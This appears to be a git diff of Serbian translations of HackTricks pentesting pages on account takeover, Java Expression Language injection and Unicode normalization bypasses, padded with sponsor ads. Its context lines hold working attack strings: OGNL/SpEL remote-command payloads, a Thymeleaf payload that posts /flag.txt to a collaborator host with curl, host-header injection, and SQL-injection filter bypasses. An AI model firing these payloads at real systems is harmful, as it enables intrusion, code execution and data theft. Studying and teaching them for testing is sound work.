* [https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd](https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd)
|
||||
* Za vežbu: [https://github.com/yavolo/eventlistener-xss-recon](https://github.com/yavolo/eventlistener-xss-recon)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač na **dark vebu** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera za krađu podataka**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-webom** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera za krađu podataka**.
|
||||
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera za krađu informacija.
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu besplatno na:
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -252,10 +252,10 @@ Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu besplatno na:
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA ČLANSTVO**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Podelite svoje hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -14,13 +14,13 @@ Drugi načini podrške HackTricks-u:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je **dark-web** pretraživač koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web**-om koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
|
||||
Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-om koji proizilaze iz malvera za krađu informacija.
|
||||
Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
|
@ -32,30 +32,30 @@ Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno
|
|||
|
||||
### Duplikat registracije
|
||||
|
||||
* Pokušajte generisati koristeći postojeće korisničko ime
|
||||
* Pokušajte generisati koristeći već postojeće korisničko ime
|
||||
* Proverite variranje e-pošte:
|
||||
* velika slova
|
||||
* \+1@
|
||||
* dodajte tačku u e-poštu
|
||||
* posebni karakteri u imenu e-pošte (%00, %09, %20)
|
||||
* Stavite crne karaktere posle e-pošte: `test@test.com a`
|
||||
* victim@gmail.com@attacker.com
|
||||
* victim@attacker.com@gmail.com
|
||||
* velika slova
|
||||
* \+1@
|
||||
* dodajte tačku u e-poštu
|
||||
* posebni karakteri u imenu e-pošte (%00, %09, %20)
|
||||
* Stavite crne karaktere posle e-pošte: `test@test.com a`
|
||||
* victim@gmail.com@attacker.com
|
||||
* victim@attacker.com@gmail.com
|
||||
|
||||
### Enumeracija korisničkog imena
|
||||
|
||||
Proverite da li možete da saznate kada je korisničko ime već registrovano unutar aplikacije.
|
||||
Proverite da li možete saznati kada je korisničko ime već registrovano unutar aplikacije.
|
||||
|
||||
### Politika lozinke
|
||||
|
||||
Prilikom kreiranja korisnika proverite politiku lozinke (proverite da li možete koristiti slabe lozinke).\
|
||||
U tom slučaju možete pokušati da probate lozinke metodom brute force.
|
||||
U tom slučaju možete pokušati sa brute force napadom na akreditive.
|
||||
|
||||
### SQL Injection
|
||||
|
||||
[**Proverite ovu stranicu** ](sql-injection/#insert-statement)da biste saznali kako pokušati preuzimanje naloga ili izvlačenje informacija putem **SQL Injection**-a u formama registracije.
|
||||
|
||||
### Oauth preuzimanja
|
||||
### Oauth preuzimanje
|
||||
|
||||
{% content-ref url="oauth-to-account-takeover.md" %}
|
||||
[oauth-to-account-takeover.md](oauth-to-account-takeover.md)
|
||||
|
@ -85,7 +85,7 @@ Kada se registrujete, pokušajte da promenite e-poštu i proverite da li je ova
|
|||
1. Zatražite resetovanje lozinke na vašu e-adresu
|
||||
2. Kliknite na link za resetovanje lozinke
|
||||
3. Ne menjajte lozinku
|
||||
4. Kliknite na bilo koju web lokaciju treće strane (npr. Facebook, Twitter)
|
||||
4. Kliknite na bilo koje web lokacije trećih lica (npr. Facebook, Twitter)
|
||||
5. Presretnite zahtev u Burp Suite proxy-u
|
||||
6. Proverite da li referer zaglavlje otkriva token za resetovanje lozinke.
|
||||
|
||||
|
@ -116,7 +116,7 @@ email=victim@mail.com|hacker@mail.com
|
|||
```
|
||||
### IDOR na API parametrima <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>
|
||||
|
||||
1. Napadač mora da se prijavi na svoj nalog i da ode na opciju **Promeni lozinku**.
|
||||
1. Napadač mora da se prijavi sa svojim nalogom i da ode na opciju **Promeni lozinku**.
|
||||
2. Pokrenite Burp Suite i presretnite zahtev.
|
||||
3. Pošaljite ga na karticu za ponavljanje i izmenite parametre: ID korisnika/e-pošta\
|
||||
`powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})`
|
||||
|
@ -124,7 +124,7 @@ email=victim@mail.com|hacker@mail.com
|
|||
### Slab token za resetovanje lozinke <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
|
||||
|
||||
Token za resetovanje lozinke treba da bude generisan nasumično i jedinstven svaki put.\
|
||||
Pokušajte da utvrdite da li token ističe ili je uvek isti, u nekim slučajevima algoritam generisanja može biti slab i može se pogoditi. Sledeće promenljive mogu biti korišćene od strane algoritma.
|
||||
Pokušajte da utvrdite da li token ističe ili je uvek isti, u nekim slučajevima algoritam generisanja je slab i može biti pogodan. Sledeće promenljive mogu biti korišćene od strane algoritma.
|
||||
|
||||
* Vremenska oznaka
|
||||
* ID korisnika
|
||||
|
@ -139,13 +139,13 @@ Pokušajte da utvrdite da li token ističe ili je uvek isti, u nekim slučajevim
|
|||
|
||||
### Otkrivanje tokena za resetovanje lozinke <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
|
||||
|
||||
1. Pokrenite zahtev za resetovanje lozinke koristeći API/UI za određenu e-poštu npr. test@mail.com
|
||||
1. Pokrenite zahtev za resetovanje lozinke koristeći API/UI za određenu e-poštu, npr. test@mail.com
|
||||
2. Inspekcionišite odgovor servera i proverite `resetToken`
|
||||
3. Zatim koristite token u URL-u poput `https://primer.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
|
||||
|
||||
### Resetovanje lozinke putem kolizije korisničkog imena <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
|
||||
|
||||
1. Registrujte se na sistemu sa korisničkim imenom identičnim korisničkom imenu žrtve, ali sa belinama ubačenim pre i/ili posle korisničkog imena. npr. `"admin "`
|
||||
1. Registrujte se na sistemu sa korisničkim imenom identičnim korisničkom imenu žrtve, ali sa belinama ubačenim pre i/ili posle korisničkog imena, npr. `"admin "`
|
||||
2. Zatražite resetovanje lozinke sa zlonamernim korisničkim imenom.
|
||||
3. Koristite token poslat na vašu e-poštu i resetujte lozinku žrtve.
|
||||
4. Povežite se sa nalogom žrtve sa novom lozinkom.
|
||||
|
@ -177,7 +177,7 @@ Content-Length: 83
|
|||
GET http://something.burpcollaborator.net HTTP/1.1
|
||||
X: X
|
||||
```
|
||||
### Izveštaji sa Hackerone o iskorišćavanju ovog baga\
|
||||
### Izveštaji Hackerone o iskorišćavanju ovog baga\
|
||||
* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)\
|
||||
* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)
|
||||
|
||||
|
@ -190,8 +190,8 @@ X: X
|
|||
|
||||
JSON Web Token može se koristiti za autentifikaciju korisnika.
|
||||
|
||||
* Izmenite JWT sa drugim ID-em korisnika / Email-om
|
||||
* Proverite da li postoji slab potpis JWT-a
|
||||
* Izmenite JWT sa drugim ID-jem korisnika / Email-om
|
||||
* Proverite da li postoji slabost u potpisu JWT-a
|
||||
|
||||
{% content-ref url="hacking-jwt-json-web-tokens.md" %}
|
||||
[hacking-jwt-json-web-tokens.md](hacking-jwt-json-web-tokens.md)
|
||||
|
@ -201,20 +201,18 @@ JSON Web Token može se koristiti za autentifikaciju korisnika.
|
|||
|
||||
* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)
|
||||
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
## WhiteIntel
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač na **dark vebu** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od strane **malvera za krađu podataka**.
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web**-om koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od strane **malvera za krađu podataka**.
|
||||
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
|
|
@ -4,7 +4,7 @@
|
|||
|
||||
<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Da li radite u **kompaniji za kibernetičku bezbednost**? Želite li da vidite svoju **kompaniju reklamiranu na HackTricks**? ili želite pristup **najnovijoj verziji PEASS-a ili preuzimanje HackTricks-a u PDF formatu**? Proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
|
||||
* Da li radite u **kompaniji za kibernetičku bezbednost**? Želite li da vidite svoju **kompaniju reklamiranu na HackTricks**? ili želite da imate pristup **najnovijoj verziji PEASS-a ili preuzmete HackTricks u PDF formatu**? Proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Pridružite se** [**💬**](https://emojipedia.org/speech-balloon/) **Discord grupi** ili **telegram grupi** ili me **pratite** na **Twitteru** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
@ -12,11 +12,11 @@
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu**.
|
||||
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
|
@ -26,37 +26,37 @@ Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno
|
|||
|
||||
---
|
||||
|
||||
## Osnovne Informacije
|
||||
## Osnovne informacije
|
||||
|
||||
Expression Language (EL) je integralan u JavaEE za povezivanje sloja prezentacije (npr. veb stranice) i aplikacione logike (npr. upravljanih beanova), omogućavajući njihovu interakciju. On se pretežno koristi u:
|
||||
Expression Language (EL) je integralan u JavaEE za povezivanje sloja prezentacije (npr. veb stranice) i aplikacione logike (npr. upravljanih beanova), omogućavajući njihovu interakciju. Pretežno se koristi u:
|
||||
|
||||
- **JavaServer Faces (JSF)**: Za povezivanje UI komponenti sa podacima/akcijama na backendu.
|
||||
- **JavaServer Pages (JSP)**: Za pristup podacima i manipulaciju unutar JSP stranica.
|
||||
- **Contexts and Dependency Injection for Java EE (CDI)**: Za olakšavanje interakcije sloja veba sa upravljanim beanovima.
|
||||
|
||||
**Konteksti Upotrebe**:
|
||||
**Konteksti upotrebe**:
|
||||
|
||||
- **Spring Framework**: Primenjen u različitim modulima poput Security i Data.
|
||||
- **Opšta Upotreba**: Kroz SpEL API od strane programera u jezicima zasnovanim na JVM-u poput Java, Kotlin i Scala.
|
||||
- **Opšta upotreba**: Kroz SpEL API od strane programera u jezicima zasnovanim na JVM-u poput Java, Kotlin i Scala.
|
||||
|
||||
EL je prisutan u JavaEE tehnologijama, samostalnim okruženjima, i prepoznatljiv je kroz ekstenzije fajlova `.jsp` ili `.jsf`, greške u steku i termine poput "Servlet" u zaglavljima. Međutim, njegove funkcionalnosti i korišćenje određenih karaktera mogu zavisiti od verzije.
|
||||
EL je prisutan u JavaEE tehnologijama, samostalnim okruženjima i prepoznatljiv kroz ekstenzije datoteka `.jsp` ili `.jsf`, greške steka i termine poput "Servlet" u zaglavljima. Međutim, njegove funkcije i korišćenje određenih karaktera mogu zavisiti od verzije.
|
||||
|
||||
{% hint style="info" %}
|
||||
Zavisno od **verzije EL-a** neke **funkcionalnosti** mogu biti **uključene** ili **isključene** i obično neki **karakteri** mogu biti **zabranjeni**.
|
||||
Zavisno o **EL verziji** neke **funkcionalnosti** mogu biti **uključene** ili **isključene** i obično neki **karakteri** mogu biti **zabranjeni**.
|
||||
{% endhint %}
|
||||
|
||||
## Osnovni Primer
|
||||
## Osnovni primer
|
||||
|
||||
(Možete pronaći još jedan zanimljiv tutorijal o EL-u na [https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/](https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/))
|
||||
|
||||
Preuzmite sa [**Maven**](https://mvnrepository.com) repozitorijuma jar fajlove:
|
||||
Preuzmite sa [**Maven**](https://mvnrepository.com) repozitorijuma jar datoteke:
|
||||
|
||||
* `commons-lang3-3.9.jar`
|
||||
* `spring-core-5.2.1.RELEASE.jar`
|
||||
* `commons-logging-1.2.jar`
|
||||
* `spring-expression-5.2.1.RELEASE.jar`
|
||||
|
||||
I kreirajte sledeći fajl `Main.java`:
|
||||
I kreirajte sledeću datoteku `Main.java`:
|
||||
```java
|
||||
import org.springframework.expression.Expression;
|
||||
import org.springframework.expression.ExpressionParser;
|
||||
|
@ -132,7 +132,7 @@ gk6q${"zkz".toString().replace("k", "x")}doap2
|
|||
#J2EEScan Detection vector (substitute the content of the response body with the content of the "INJPARAM" parameter concatenated with a sum of integer):
|
||||
https://www.example.url/?vulnerableParameter=PRE-${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.print(new%20java.lang.Integer(829%2b9))%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}-POST&INJPARAM=HOOK_VAL
|
||||
```
|
||||
* Sačekaj 10 sekundi
|
||||
* Spavaj 10 sekundi
|
||||
```bash
|
||||
#Blind detection vector (sleep during 10 seconds)
|
||||
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23kzxs%3d%40java.lang.Thread%40sleep(10000)%2c1%3f%23xx%3a%23request.toString}
|
||||
|
@ -163,7 +163,7 @@ https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlCo
|
|||
# With HTMl entities injection inside the template
|
||||
<a th:href="${''.getClass().forName('java.lang.Runtime').getRuntime().exec('curl -d @/flag.txt burpcollab.com')}" th:title='pepito'>
|
||||
```
|
||||
* Izvršenje udaljenih komandi **linux**
|
||||
* RCE **linux**
|
||||
```bash
|
||||
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=@java.lang.Runtime@getRuntime(),%23ssss=new%20java.lang.String[3],%23ssss[0]="%2fbin%2fsh",%23ssss[1]="%2dc",%23ssss[2]=%23parameters.INJPARAM[0],%23wwww.exec(%23ssss),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=touch%20/tmp/InjectedFile.txt
|
||||
```
|
||||
|
@ -209,11 +209,11 @@ T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec
|
|||
```
|
||||
### Pregledanje okruženja
|
||||
|
||||
* `applicationScope` - globalne promenljive aplikacije
|
||||
* `applicationScope` - globalne aplikacijske promenljive
|
||||
* `requestScope` - promenljive zahteva
|
||||
* `initParam` - inicijalne promenljive aplikacije
|
||||
* `initParam` - inicijalne aplikacijske promenljive
|
||||
* `sessionScope` - promenljive sesije
|
||||
* `param.X` - vrednost parametra gde je X ime HTTP parametra
|
||||
* `param.X` - vrednost parametra gde je X ime http parametra
|
||||
|
||||
Potrebno je da konvertujete ove promenljive u String kao što je prikazano:
|
||||
```bash
|
||||
|
@ -240,13 +240,13 @@ Proverite [https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/](http
|
|||
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools)
|
||||
* [https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt](https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web**-om koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji krade podatke**.
|
||||
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera koji krade informacije.
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera koji krade informacije.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
|
@ -256,7 +256,7 @@ Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno
|
|||
|
||||
<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Da li radite u **kompaniji za kibernetičku bezbednost**? Želite li da vidite svoju **kompaniju reklamiranu na HackTricks**? ili želite pristup **najnovijoj verziji PEASS-a ili preuzimanje HackTricks-a u PDF-u**? Proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Da li radite u **kompaniji za kibernetičku bezbednost**? Želite li da vidite svoju **kompaniju reklamiranu na HackTricks**? ili želite pristupiti **najnovijoj verziji PEASS-a ili preuzeti HackTricks u PDF formatu**? Proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Pridružite se** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili **telegram grupi** ili me **pratite** na **Twitteru** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
|
|
@ -14,15 +14,15 @@ Drugi načini podrške HackTricks-u:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
|
||||
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera za krađu informacija.
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu besplatno na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -44,7 +44,7 @@ Postoje **četiri algoritma normalizacije Unikoda**: NFC, NFD, NFKC i NFKD. Svak
|
|||
Razumevanje kodiranja Unikoda je ključno, posebno kada se bave pitanjima interoperabilnosti među različitim sistemima ili jezicima. Evo glavnih tačaka:
|
||||
|
||||
* **Kodne Tačke i Karakteri**: U Unikodu, svakom karakteru ili simbolu je dodeljena numerička vrednost poznata kao "kodna tačka".
|
||||
* **Reprezentacija Bajtova**: Kodna tačka (ili karakter) je predstavljena jednim ili više bajtova u memoriji. Na primer, LATIN-1 karakteri (uobičajeni u zemljama gde se govori engleski) se predstavljaju koristeći jedan bajt. Međutim, jezici sa većim skupom karaktera zahtevaju više bajtova za reprezentaciju.
|
||||
* **Reprezentacija Bajtova**: Kodna tačka (ili karakter) je predstavljena jednim ili više bajtova u memoriji. Na primer, LATIN-1 karakteri (uobičajeni u engleskim govornim zemljama) se predstavljaju koristeći jedan bajt. Međutim, jezici sa većim skupom karaktera zahtevaju više bajtova za reprezentaciju.
|
||||
* **Kodiranje**: Ovaj termin se odnosi na to kako se karakteri transformišu u niz bajtova. UTF-8 je rasprostranjeni standard kodiranja gde se ASCII karakteri predstavljaju koristeći jedan bajt, a do četiri bajta za ostale karaktere.
|
||||
* **Obrada Podataka**: Sistemi koji obrađuju podatke moraju biti svesni korišćenog kodiranja kako bi ispravno konvertovali niz bajtova u karaktere.
|
||||
* **Varijante UTF**: Pored UTF-8, postoje i drugi standardi kodiranja poput UTF-16 (koristi minimalno 2 bajta, do 4) i UTF-32 (koristi 4 bajta za sve karaktere).
|
||||
|
@ -59,15 +59,15 @@ unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "ch
|
|||
|
||||
### Otkrivanje
|
||||
|
||||
Ako pronađete vrednost unutar veb aplikacije koja se vraća, možete pokušati poslati **'KELVIN SIGN' (U+0212A)** koji se **normalizuje u "K"** (možete ga poslati kao `%e2%84%aa`). **Ako se "K" vrati nazad**, tada se vrši neka vrsta **Unicode normalizacije**.
|
||||
Ako pronađete vrednost unutar web aplikacije koja se vraća nazad, možete pokušati poslati **'KELVIN SIGN' (U+0212A)** koji se **normalizuje u "K"** (možete ga poslati kao `%e2%84%aa`). **Ako se "K" vrati nazad**, tada se vrši neka vrsta **Unicode normalizacije**.
|
||||
|
||||
Drugi **primer**: `%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83` nakon **unicode** postaje `Leonishan`.
|
||||
|
||||
## **Ranjivi Primeri**
|
||||
## **Vulnerabilni Primeri**
|
||||
|
||||
### **Bypass filtriranja SQL Injection-a**
|
||||
### **Bypass filtera za SQL Injection**
|
||||
|
||||
Zamislite veb stranicu koja koristi karakter `'` za kreiranje SQL upita sa korisničkim unosom. Ova veb stranica, kao sigurnosna mera, **briše** sve pojave karaktera **`'`** iz korisničkog unosa, ali **nakon te brisanja** i **pre kreiranja** upita, **normalizuje** korisnički unos pomoću **Unicode-a**.
|
||||
Zamislite web stranicu koja koristi karakter `'` za kreiranje SQL upita sa korisničkim unosom. Ova web stranica, kao sigurnosna mera, **briše** sve pojave karaktera **`'`** iz korisničkog unosa, ali **nakon te brisanja** i **pre kreiranja** upita, **normalizuje** korisnički unos pomoću **Unicode-a**.
|
||||
|
||||
Zatim, zlonamerni korisnik može ubaciti drugačiji Unicode karakter ekvivalentan sa `' (0x27)` poput `%ef%bc%87`, kada se unos normalizuje, kreiran je jednostruki navod i pojavljuje se **SQLInjection ranjivost**:
|
||||
|
||||
|
@ -125,11 +125,11 @@ Alatka [**recollapse**](https://github.com/0xacb/recollapse) omogućava **generi
|
|||
* [**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work)
|
||||
* [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-webom** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici kompromitovani od strane **malvera koji krade podatke**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač na **dark vebu** koji nudi **besplatne** funkcionalnosti za proveru da li su kompanija ili njeni korisnici **ugroženi** od **malvera koji krade podatke**.
|
||||
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera koji krade informacije.
|
||||
|
||||
|
|
|
@ -8,21 +8,21 @@ Drugi načini podrške HackTricks-u:
|
|||
|
||||
* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
